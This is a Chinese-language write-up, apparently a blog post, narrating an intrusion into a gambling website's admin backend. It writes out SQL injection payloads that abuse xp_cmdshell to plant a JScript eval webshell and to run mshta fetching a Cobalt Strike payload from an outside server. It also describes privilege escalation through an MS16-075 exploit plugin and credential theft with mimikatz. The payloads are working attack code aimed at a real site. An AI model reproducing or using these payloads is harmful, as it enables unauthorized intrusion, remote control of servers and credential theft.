某博彩网站测试

我得到的只有一个后台网址，首先也就是信息搜集了。在网络空间安全搜索引擎fofa上查询一下，再就是端口扫描 ，直接略过说有利用价值的端口：80,81,1433,3389
脆弱点：http://49.xxx.xx.xxx:81/Login/index
SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)
权限：SA

刚开始得到注入就想着进入后台看看，然后肝了一段时间的py脚本，原谅我CAI

得到密码进入后台，模板千篇一律，无数据备份，无修改模板，上传个人判断基于白名单，有编辑器不过示例代码已删除，留言板不可留言，回过头来又看注入，既然是堆叠注入，那就可以执行SQL语句，然后一顿操作，嗯嗯嗯… 没有回显，代码如下：

以为到这里就结束了，没想到 3389端口登录失败，1433端口连接失败，这里我很懵，经过大佬的一番指导，堆叠注入是没有回显的，这时可ping以下dnslog,还好前几天补过：

既然dnslog有回显，那就证明xp_cmdshel扩展开启，可以执行命令，这里两种思路
第一种是cmd执行命令，输出到网站根目录
';exec master…xp_cmdshell ‘echo ^<%@ Page Language=“Jscript”%^><%eval(Request.Item[“pass”],“unsafe”);%^> > c:\网站路径\shell.aspx’;–
由于我爆不出来绝对路径就采用了第二种方法

第二种是下载木马，运行木马直接上线
cs设置好监听器，生成一个html application文件，然后上传到cs服务器上
在注入点执行
'; exec master.dbo.xp_cmdshell ‘mshta http://39.xx.xxx.xxx:80/download/file.ext’; –
过一会儿有台主机上线了

设置好beacon回连时间，且不存在域

补丁安装200多，较多，把systeminfo中的信息漏洞对比，看有没有漏补的，发现可利用漏洞ms16-075
systeminfo | findstr KB3164038
https://github.com/vysecurity/reflectivepotato.git github上该exp的cna插件，加载到脚本管理器中

这里不应该直接创建管理员，应该mimikatz读取hash或者SSP获取明文密码，至此测试结束。